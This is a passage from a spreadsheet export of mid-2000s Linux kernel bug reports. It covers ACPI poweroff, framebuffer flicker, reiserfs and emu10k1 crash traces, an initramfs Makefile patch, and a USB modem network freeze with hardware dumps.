    <t>Most recent kernel where this bug did not occur: n/a - occured since 2.6.13, first kernel on machine Distribution: Gentoo Hardware Environment: amd64 Software Environment: Gentoo/Linux Problem Description: via velocity always thinks cable is plugged in according to netplug and/or ifplugd Steps to reproduce: Install Gentoo emerge baselayout-1.12.1 emerge netplug remove network cable /etc/init.d/net.eth0 restart examine log to see netplug claiming eth0 has a cable inserted</t>
  </si>
  <si>
    <t>CONFIG_ACPI_SLEEP=y prevents poweroff -- it reboots instead - tyan s2882</t>
  </si>
  <si>
    <t>2.6.16.20</t>
  </si>
  <si>
    <t>2006-06-18 20:15 UTC</t>
  </si>
  <si>
    <t>dean gaudet</t>
  </si>
  <si>
    <t>2008-08-26 00:44 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: debian unstable Hardware Environment: tyan s2882, amd64 Software Environment: Problem Description: if i build the kernel with CONFIG_ACPI_SLEEP=y and do "shutdown -h now" the system reboots instead of powering off... if i disable that config option and attempt to "shutdown -h now" the system powers off fine. i'd like to be able to run vendor kernels... so resolving the problem with CONFIG_ACPI_SLEEP=y would be cool. oh the bios is the latest greatest from tyan (3.07 iirc). Steps to reproduce: "shutdown -h now"</t>
  </si>
  <si>
    <t>mga framebuffer flickers after upgrading to 2.6.17</t>
  </si>
  <si>
    <t>2006-06-19 13:42 UTC</t>
  </si>
  <si>
    <t>markus gapp</t>
  </si>
  <si>
    <t>2006-09-10 10:04 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16.20 Distribution: gentoo -- vanilla sources Hardware Environment: dual opteron, mga g550, lcd connected via dvi Software Environment: framebuffer console Problem Description: after upgrading to 2.6.17 on an opteron smp machine (x86_64 kernel) with a mga g550 vga several dots around letters on a framebuffer console are flickering. matroxfb is compiled as a module. this also happens to an X server using mga and fbhw submodule. Steps to reproduce:</t>
  </si>
  <si>
    <t>quote problem in initramfs source string</t>
  </si>
  <si>
    <t>2006-06-20 23:38 UTC</t>
  </si>
  <si>
    <t>hippo5329</t>
  </si>
  <si>
    <t>2006-10-08 12:29 UTC</t>
  </si>
  <si>
    <t>Kernel bug in reiserfs bitmap.c (reiserfs_read_bitmap_block)</t>
  </si>
  <si>
    <t>2.6.17-mm1</t>
  </si>
  <si>
    <t>2006-06-21 09:46 UTC</t>
  </si>
  <si>
    <t>2006-06-30 01:54 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17-rc6-mm2 Distribution: Gentoo Linux Hardware Environment: HP Compaq nx6125 laptop with AMD Turion 64 Software Environment: Problem Description: When KDE tries to start it only loads the background and then it stops loading. If I check the output of dmesg I get this error: ------------[ cut here ]------------ kernel BUG at fs/reiserfs/bitmap.c:1307! invalid opcode: 0000 [#3] 4K_STACKS PREEMPT last sysfs file: /block/hdc/size Modules linked in: radeon drm eth1394 evdev bcm43xx ieee80211softmac ati_agp ieee80211 ohci1394 agpgart tg3 ieee1394 ieee80211_crypt sdhci pcspkr CPU: 0 EIP: 0060:[&lt;c01ab256&gt;] Not tainted VLI EFLAGS: 00010246 (2.6.17-mm1 #2) EIP is at reiserfs_cache_bitmap_metadata+0x76/0x90 eax: 00000000 ebx: d89a53d4 ecx: d4eceffc edx: d4ece000 esi: d7768400 edi: 00000000 ebp: d89a5000 esp: d75cbc10 ds: 007b es: 007b ss: 0068 Process dcopserver (pid: 8256, ti=d75cb000 task=d6b2a560 task.ti=d75cb000) Stack: d30f9904 d7768400 000000f5 c01ab301 d7768400 d30f9904 d89a53d4 0000001a d89a53d4 000c0652 00000118 d75cbd00 c01ab4b4 d7768400 000000f5 00000ba6 00000001 d75cbc6c 000000f5 d75cbee4 d7768400 d89a53d4 00000000 00000ba6 Call Trace: [&lt;c01ab301&gt;] reiserfs_read_bitmap_block+0x91/0x110 [&lt;c01ab4b4&gt;] scan_bitmap_block+0x64/0x340 [&lt;c01ac853&gt;] reiserfs_allocate_blocknrs+0x6d3/0xfc0 [&lt;c01bac3a&gt;] reiserfs_file_write+0xc6a/0x2060 [&lt;c012f360&gt;] autoremove_wake_function+0x0/0x60 [&lt;c01d10bc&gt;] do_journal_end+0x16c/0xc60 [&lt;c0183334&gt;] d_instantiate+0x44/0x70 [&lt;c014c046&gt;] __alloc_pages+0x66/0x300 [&lt;c015cafc&gt;] anon_vma_prepare+0xec/0x110 [&lt;c015c681&gt;] __page_set_anon_rmap+0x31/0x40 [&lt;c01568a4&gt;] __handle_mm_fault+0x7e4/0x910 [&lt;c0169b95&gt;] vfs_write+0xb5/0x1a0 [&lt;c016a29b&gt;] sys_write+0x4b/0x80 [&lt;c044f801&gt;] sysenter_past_esp+0x56/0x79 Code: b6 00 00 00 00 0f a3 11 19 c0 85 c0 75 0a 66 ff 43 02 8d 04 16 66 89 03 4a 83 fa ff 75 e7 4f 75 c6 66 83 3b 00 74 04 5b 5e 5f c3 &lt;0f&gt; 0b 1b 05 cc 4c 47 c0 89 f6 eb f0 8d b4 26 00 00 00 00 8d bc EIP: [&lt;c01ab256&gt;] reiserfs_cache_bitmap_metadata+0x76/0x90 SS:ESP 0068:d75cbc10 BUG: warning at kernel/exit.c:855/do_exit() [&lt;c011cef5&gt;] do_exit+0x8c5/0xa10 [&lt;c0119fcb&gt;] printk+0x1b/0x20 [&lt;c0103add&gt;] die+0x2cd/0x2d0 [&lt;c045051b&gt;] iret_exc+0x7ad/0x96b [&lt;c01043f0&gt;] do_invalid_op+0x0/0xc0 [&lt;c010449b&gt;] do_invalid_op+0xab/0xc0 [&lt;c01ab256&gt;] reiserfs_cache_bitmap_metadata+0x76/0x90 [&lt;c01461b6&gt;] find_get_page+0x26/0x70 [&lt;c016b61e&gt;] __find_get_block_slow+0x6e/0x150 [&lt;c01ca76a&gt;] search_for_position_by_key+0x17a/0x390 [&lt;c016b996&gt;] __find_get_block+0x96/0x1a0 [&lt;c01030d5&gt;] error_code+0x39/0x40 [&lt;c01ab256&gt;] reiserfs_cache_bitmap_metadata+0x76/0x90 [&lt;c01ab301&gt;] reiserfs_read_bitmap_block+0x91/0x110 [&lt;c01ab4b4&gt;] scan_bitmap_block+0x64/0x340 [&lt;c01ac853&gt;] reiserfs_allocate_blocknrs+0x6d3/0xfc0 [&lt;c01bac3a&gt;] reiserfs_file_write+0xc6a/0x2060 [&lt;c012f360&gt;] autoremove_wake_function+0x0/0x60 [&lt;c01d10bc&gt;] do_journal_end+0x16c/0xc60 [&lt;c0183334&gt;] d_instantiate+0x44/0x70 [&lt;c014c046&gt;] __alloc_pages+0x66/0x300 [&lt;c015cafc&gt;] anon_vma_prepare+0xec/0x110 [&lt;c015c681&gt;] __page_set_anon_rmap+0x31/0x40 [&lt;c01568a4&gt;] __handle_mm_fault+0x7e4/0x910 [&lt;c0169b95&gt;] vfs_write+0xb5/0x1a0 [&lt;c016a29b&gt;] sys_write+0x4b/0x80 [&lt;c044f801&gt;] sysenter_past_esp+0x56/0x79</t>
  </si>
  <si>
    <t>native midi on emu10k1 casue fatal exceptions, kernel BUG at include/linux/list.h:58!</t>
  </si>
  <si>
    <t>2.6.17.1</t>
  </si>
  <si>
    <t>2006-06-22 22:54 UTC</t>
  </si>
  <si>
    <t>2006-08-28 02:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution:Fedora core 5 Hardware Environment:Dell 8400, Intel 925X, Audigy 2 Software Environment:kernel-2.6.17-1.2138_FC5(2.6.17.1), gcc-4.1.1-1.fc5 , glibc-2.4-9 Problem Description: I can cause kernel panic by either alsasound stop or using a native midi player like pmidi. osss midi player does not cause crash.pmidi -p 17:1 midifile. 1./sbin/modprobe snd-emu10k1-synth 2./bin/asfxload *.sf2 3.pmidi -p 17.0 any.midi file 4. hit ctrl-c during playing a midi file Jun 21 21:04:53 knutjorgen kernel: ------------[ cut here ]------------ Jun 21 21:04:53 knutjorgen kernel: kernel BUG at include/linux/list.h:58! Jun 21 21:04:53 knutjorgen kernel: invalid opcode: 0000 [#1] Jun 21 21:04:53 knutjorgen kernel: last sysfs file: /class/sound/midiC0D3/dev Jun 21 21:04:53 knutjorgen kernel: Modules linked in: snd_seq_midi snd_rtctimer snd_emu10k1_synth snd_emux_synth snd_seq_virmidi snd_seq_midi_emul ipv6 autofs4 hidp l2cap bluetooth sunrpc ip_conntrack_netbios_ns ipt_REJECT xt_state ip_conntrack nfnetlink xt_tcpudp iptable_filter ip_tables x_tables video button battery ac lp parport_pc parport usblp ohci1394 ieee1394 usb_storage uhci_hcd ehci_hcd floppy sg snd_emu10k1 snd_rawmidi snd_ac97_codec snd_ac97_bus snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_pcm_oss snd_mixer_oss bt878 tuner tda9887 msp3400 snd_pcm snd_seq_device snd_timer snd_page_alloc snd_util_mem snd_hwdep snd bttv video_buf ir_common compat_ioctl32 i2c_algo_bit v4l2_common soundcore btcx_risc tveeprom tg3 videodev emu10k1_gp gameport i2c_i801 i2c_core dm_snapshot dm_zero dm_mirror dm_mod ata_piix ext3 jbd ahci libata sd_mod scsi_mod Jun 21 21:04:53 knutjorgen kernel: CPU: 0 Jun 21 21:04:53 knutjorgen kernel: EIP: 0060:[&lt;f8a31234&gt;] Not tainted VLI Jun 21 21:04:53 knutjorgen kernel: EFLAGS: 00010082 (2.6.17-1.2138_FC5 #1) Jun 21 21:04:53 knutjorgen kernel: EIP is at snd_seq_delete_all_ports+0x60/0x176 [snd_seq] Jun 21 21:04:53 knutjorgen kernel: eax: 00000044 ebx: f767a768 ecx: c06bcfd0 edx: f7f7a000 Jun 21 21:04:53 knutjorgen kernel: esi: f767a768 edi: f56d67e8 ebp: f56d6760 esp: f4edef30 Jun 21 21:04:53 knutjorgen kernel: ds: 007b es: 007b ss: 0068 Jun 21 21:04:53 knutjorgen kernel: Process pmidi (pid: 2994, threadinfo=f4ede000 task=f7f7a000) Jun 21 21:04:53 knutjorgen kernel: Stack: f8a32432 f767a768 f56d67e8 f56d67fc f56d67f0 00000282 22222222 22222222 Jun 21 21:04:53 knutjorgen kernel: f56d6760 f75973e0 f75973e0 f4ebc734 f8a2c1bc f56d6760 f8a2c26e 00000000 Jun 21 21:04:53 knutjorgen kernel: f7597568 00000008 f56d6760 f8a2c2bc 00000008 c045e00e 00000000 f71d0340 Jun 21 21:04:53 knutjorgen kernel: Call Trace: Jun 21 21:04:53 knutjorgen kernel: &lt;f8a2c1bc&gt; seq_free_client1+0x8/0x7e [snd_seq] &lt;f8a2c26e&gt; seq_free_client+0x3c/0x78 [snd_seq] Jun 21 21:04:53 knutjorgen kernel: &lt;f8a2c2bc&gt; snd_seq_release+0x12/0x31 [snd_seq] &lt;c045e00e&gt; __fput+0xb2/0x158 Jun 21 21:04:53 knutjorgen kernel: &lt;c045b940&gt; filp_close+0x52/0x59 &lt;c0402cb3&gt; syscall_call+0x7/0xb Jun 21 21:04:53 knutjorgen kernel: Code: 00 00 74 6d 8b 9d 88 00 00 00 8b b5 8c 00 00 00 8b 43 04 39 f0 74 1c 89 74 24 04 89 44 24 08 c7 04 24 32 24 a3 f8 e8 8f b7 9e c7 &lt;0f&gt; 0b 3a 00 1d 24 a3 f8 8b 06 39 d8 74 1c 89 5c 24 04 89 44 24 Jun 21 21:04:53 knutjorgen kernel: EIP: [&lt;f8a31234&gt;] snd_seq_delete_all_ports+0x60/0x176 [snd_seq] SS:ESP 0068:f4edef30 Jun 21 21:04:53 knutjorgen kernel: &lt;0&gt;Fatal exception: panic in 5 seconds https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=196149 and https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=194597 The kernel is untainted.</t>
  </si>
  <si>
    <t>Size of initramfs_data.cpio.gz is doubled.</t>
  </si>
  <si>
    <t>2006-06-24 02:23 UTC</t>
  </si>
  <si>
    <t>thomas</t>
  </si>
  <si>
    <t>2006-08-03 14:03 UTC</t>
  </si>
  <si>
    <t>6741 6742 6743</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.16 Distribution: Hardware Environment: Software Environment: Problem Description: gen_initramfs_list.sh concatenates two identical cpio-archives. Bug in usr/Makefile: ramfs-input := $(if $(filter-out "",$(CONFIG_INITRAMFS_SOURCE)), \ $(CONFIG_INITRAMFS_SOURCE),-d) ramfs-args := \ $(if $(CONFIG_INITRAMFS_ROOT_UID), -u $(CONFIG_INITRAMFS_ROOT_UID)) \ $(if $(CONFIG_INITRAMFS_ROOT_GID), -g $(CONFIG_INITRAMFS_ROOT_GID)) \ $(ramfs-input) # .initramfs_data.cpio.gz.d is used to identify all files included # in initramfs and to detect if any files are added/removed. # Removed files are identified by directory timestamp being updated # The dependency list is generated by gen_initramfs.sh -l ifneq ($(wildcard $(obj)/.initramfs_data.cpio.gz.d),) include $(obj)/.initramfs_data.cpio.gz.d endif quiet_cmd_initfs = GEN $@ cmd_initfs = $(initramfs) -o $@ $(ramfs-args) $(ramfs-input) ^^^^^^^^^^^^^^ Patch: --- Makefile.orig 2006-06-24 11:04:58.060163593 +0200 +++ Makefile 2006-06-24 10:35:52.551677940 +0200 @@ -33,7 +33,7 @@ endif quiet_cmd_initfs = GEN $@ - cmd_initfs = $(initramfs) -o $@ $(ramfs-args) $(ramfs-input) + cmd_initfs = $(initramfs) -o $@ $(ramfs-args) targets := initramfs_data.cpio.gz $(deps_initramfs): klibcdirs Steps to reproduce: ...</t>
  </si>
  <si>
    <t>Network randomly freezes (eth1 usb cable modem)</t>
  </si>
  <si>
    <t>2.6.17+</t>
  </si>
  <si>
    <t>2006-06-25 09:00 UTC</t>
  </si>
  <si>
    <t>luminoso</t>
  </si>
  <si>
    <t>2006-08-31 11:48 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.17.1 vanilla Distribution:Gentoo Hardware Environment: Software Environment: Problem Description:Internet connection randomly freezes with Motorola SB5100 Cable Modem (USB), with no dmesg messages. Steps to reproduce: I just installed 2.6.17.1 vanilla kernel. --------------------------------------------------------------------------- Hi.. I am using kernel-2.6.17.1 for a few days and i had a few problems with my network connections. My eth1 (Motorola SB5100 Cable Modem(USB)) freezes randomly, with no justification. It keeps showing com ifconfig and also show an ip. It happens more freqnuently when i am using amule, dmesg don't show anything. To have connection again i can unplug and plug the usb cable, or simply do /etc/init.d/net.eth1 restart. I am also using dhcpcd 2.0.7, but i think there is no problem is that, because with 2.6.16 kernel i have no problems at all. -- cat /proc/version Linux version 2.6.17-ck1 (root@khona4) (gcc version 4.1.1 (Gentoo 4.1.1)) #3 SMP PREEMPT Sun Jun 25 15:47:02 WEST 2006 -- cat /proc/modules cat /proc/modules w83627hf 22672 0 - Live 0xfe54a000 hwmon_vid 2816 1 w83627hf, Live 0xfe529000 i2c_isa 3712 1 w83627hf, Live 0xfe514000 snd_seq_midi 6432 0 - Live 0xfe509000 snd_emu10k1_synth 6656 0 - Live 0xf987d000 snd_emux_synth 31616 1 snd_emu10k1_synth, Live 0xfe538000 snd_seq_virmidi 5760 1 snd_emux_synth, Live 0xfe506000 snd_seq_midi_emul 6016 1 snd_emux_synth, Live 0xf9877000 snd_pcm_oss 33696 0 - Live 0xfe52e000 snd_mixer_oss 15232 1 snd_pcm_oss, Live 0xfe50c000 snd_seq_oss 29952 0 - Live 0xfd8f7000 snd_seq_midi_event 6144 3 snd_seq_midi,snd_seq_virmidi,snd_seq_oss, Live 0xf987a000 snd_seq 46928 8 snd_seq_midi,snd_emux_synth,snd_seq_virmidi,snd_seq_midi_emul,snd_seq_oss,snd_seq_midi_event, Live 0xfe516000 snd_emu10k1 112292 2 snd_emu10k1_synth, Live 0xfd881000 snd_rawmidi 19232 3 snd_seq_midi,snd_seq_virmidi,snd_emu10k1, Live 0xf9855000 snd_ac97_codec 88352 1 snd_emu10k1, Live 0xfd89e000 snd_ac97_bus 2176 1 snd_ac97_codec, Live 0xf982b000 snd_pcm 65284 3 snd_pcm_oss,snd_emu10k1,snd_ac97_codec, Live 0xf9862000 snd_seq_device 6412 7 snd_seq_midi,snd_emu10k1_synth,snd_emux_synth,snd_seq_oss,snd_seq,snd_emu10k1,snd_rawmidi, Live 0xf984b000 snd_timer 18820 3 snd_seq,snd_emu10k1,snd_pcm, Live 0xf9838000 snd_page_alloc 7816 2 snd_emu10k1,snd_pcm, Live 0xf9835000 snd_util_mem 3584 2 snd_emux_synth,snd_emu10k1, Live 0xf9833000 snd_hwdep 6916 2 snd_emux_synth,snd_emu10k1, Live 0xf9830000 snd 43748 15 snd_emux_synth,snd_seq_virmidi,snd_pcm_oss,snd_mixer_oss,snd_seq_oss,snd_seq,snd_emu10k1,snd_rawmidi,snd_ac97_codec,snd_pcm,snd_seq_device,snd_timer,snd_hwdep, Live 0xf983f000 soundcore 7648 1 snd, Live 0xf982d000 --- cat /proc/ioports 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-006f : keyboard 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : ide1 01f0-01f7 : ide0 0295-0296 : w83627hf 02f8-02ff : serial 0376-0376 : ide1 03c0-03df : vesafb 03f6-03f6 : ide0 03f8-03ff : serial 0400-041f : 0000:00:1f.3 0480-04bf : 0000:00:1f.0 0800-087f : 0000:00:1f.0 d000-dfff : PCI Bus #02 d800-d8ff : 0000:02:05.0 d800-d8ff : sk98lin df80-df9f : 0000:02:0c.0 df80-df9f : EMU10K1 dfe0-dfe7 : 0000:02:0c.1 eec0-eedf : 0000:00:1d.0 eec0-eedf : uhci_hcd ef00-ef1f : 0000:00:1d.1 ef00-ef1f : uhci_hcd ef20-ef3f : 0000:00:1d.2 ef20-ef3f : uhci_hcd ef40-ef5f : 0000:00:1d.3 ef40-ef5f : uhci_hcd ef90-ef9f : 0000:00:1f.2 ef90-ef9f : libata efa0-efa7 : 0000:00:1f.2 efa0-efa7 : libata efa8-efab : 0000:00:1f.2 efa8-efab : libata efac-efaf : 0000:00:1f.2 efac-efaf : libata efe0-efe7 : 0000:00:1f.2 efe0-efe7 : libata fc00-fc0f : 0000:00:1f.1 fc00-fc07 : ide0 fc08-fc0f : ide1 --- cat /proc/iomem # cat /proc/iomem 00000000-0009fbff : System RAM 0009fc00-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000cfbff : Video ROM 000d0000-000d49ff : Adapter ROM 000f0000-000fffff : System ROM 00100000-3ff2ffff : System RAM 00100000-0035ecb4 : Kernel code 0035ecb5-0040c467 : Kernel data 3ff30000-3ff3ffff : ACPI Tables 3ff40000-3ffeffff : ACPI Non-volatile Storage 3fff0000-3fffffff : reserved 50000000-500003ff : 0000:00:1f.1 d7f00000-f7efffff : PCI Bus #01 e0000000-efffffff : 0000:01:00.0 e0000000-efffffff : nvidiafb f8000000-fbffffff : 0000:00:00.0 fc900000-fe9fffff : PCI Bus #01 fd000000-fdffffff : 0000:01:00.0 fd000000-fdffffff : nvidiafb fe9e0000-fe9fffff : 0000:01:00.0 fea00000-feafffff : PCI Bus #02 feafc000-feafffff : 0000:02:05.0 feafc000-feafffff : sk98lin febffc00-febfffff : 0000:00:1d.7 febffc00-febfffff : ehci_hcd ffb80000-ffffffff : reserved -- lspci -vvv 00:00.0 Host bridge: Intel Corporation 82875P/E7210 Memory Controller Hub (rev 02) Subsystem: ASUSTeK Computer Inc. Unknown device 80f6 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Region 0: Memory at f8000000 (32-bit, prefetchable) [size=64M] Capabilities: [e4] Vendor Specific Information Capabilities: [a0] AGP version 3.0 Status: RQ=32 Iso- ArqSz=2 Cal=2 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3+ Rate=x4,x8 Command: RQ=1 ArqSz=0 Cal=2 SBA+ AGP- GART64- 64bit- FW- Rate=&lt;none&gt; 00:01.0 PCI bridge: Intel Corporation 82875P Processor to AGP Controller (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 96 Bus: primary=00, secondary=01, subordinate=01, sec-latency=96 I/O behind bridge: 0000f000-00000fff Memory behind bridge: fc900000-fe9fffff Prefetchable memory behind bridge: d7f00000-f7efffff Secondary status: 66MHz+ FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA+ MAbort- &gt;Reset- FastB2B- 00:1d.0 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #1 (rev 02) (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. P5P800-MX Mainboard Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 4: I/O ports at eec0 [size=32] 00:1d.1 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #2 (rev 02) (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. P5P800-MX Mainboard Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 19 Region 4: I/O ports at ef00 [size=32] 00:1d.2 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #3 (rev 02) (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. P5P800-MX Mainboard Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin C routed to IRQ 18 Region 4: I/O ports at ef20 [size=32] 00:1d.3 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #4 (rev 02) (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. P5P800-MX Mainboard Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 4: I/O ports at ef40 [size=32] 00:1d.7 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB2 EHCI Controller (rev 02) (prog-if 20 [EHCI]) Subsystem: ASUSTeK Computer Inc. P5P800-MX Mainboard Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin D routed to IRQ 23 Region 0: Memory at febffc00 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Debug port 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev c2) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=02, subordinate=02, sec-latency=96 I/O behind bridge: 0000d000-0000dfff Memory behind bridge: fea00000-feafffff Prefetchable memory behind bridge: fff00000-000fffff Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- 00:1f.0 ISA bridge: Intel Corporation 82801EB/ER (ICH5/ICH5R) LPC Interface Bridge (rev 02) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:1f.1 IDE interface: Intel Corporation 82801EB/ER (ICH5/ICH5R) IDE Controller (rev 02) (prog-if 8a [Master SecP PriP]) Subsystem: ASUSTeK Computer Inc. P5P800-MX Mainboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 18 Region 0: I/O ports at &lt;unassigned&gt; Region 1: I/O ports at &lt;unassigned&gt; Region 2: I/O ports at &lt;unassigned&gt; Region 3: I/O ports at &lt;unassigned&gt; Region 4: I/O ports at fc00 [size=16] Region 5: Memory at 50000000 (32-bit, non-prefetchable) [size=1K] 00:1f.2 RAID bus controller: Intel Corporation 82801ER (ICH5R) SATA Controller (rev 02) (prog-if 8f) Subsystem: ASUSTeK Computer Inc. Unknown device 80a6 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 18 Region 0: I/O ports at efe0 [size=8] Region 1: I/O ports at efac [size=4] Region 2: I/O ports at efa0 [size=8] Region 3: I/O ports at efa8 [size=4] Region 4: I/O ports at ef90 [size=16] 00:1f.3 SMBus: Intel Corporation 82801EB/ER (ICH5/ICH5R) SMBus Controller (rev 02) Subsystem: ASUSTeK Computer Inc. P4P800 Mainboard Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin B routed to IRQ 17 Region 4: I/O ports at 0400 [size=32] 01:00.0 VGA compatible controller: nVidia Corporation NV31 [GeForce FX 5600] (rev a1) (prog-if 00 [VGA]) Subsystem: Micro-Star International Co., Ltd. Unknown device 9124 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 96 (1250ns min, 250ns max) Interrupt: pin A routed to IRQ 16 Region 0: Memory at fd000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at e0000000 (32-bit, prefetchable) [size=256M] Expansion ROM at fe9e0000 [disabled] [size=128K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [44] AGP version 3.0 Status: RQ=32 Iso- ArqSz=0 Cal=3 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3+ Rate=x4,x8 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; 02:05.0 Ethernet controller: 3Com Corporation 3c940 10/100/1000Base-T [Marvell] (rev 12) Subsystem: ASUSTeK Computer Inc. A7V600/P4P800/K8V motherboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 96 (5750ns min, 7750ns max), Cache Line Size: 16 bytes Interrupt: pin A routed to IRQ 22 Region 0: Memory at feafc000 (32-bit, non-prefetchable) [size=16K] Region 1: I/O ports at d800 [size=256] Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=1 PME- Capabilities: [50] Vital Product Data 02:0c.0 Multimedia audio controller: Creative Labs SB Live! EMU10k1 (rev 08) Subsystem: Creative Labs CT4832 SBLive! Value Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- 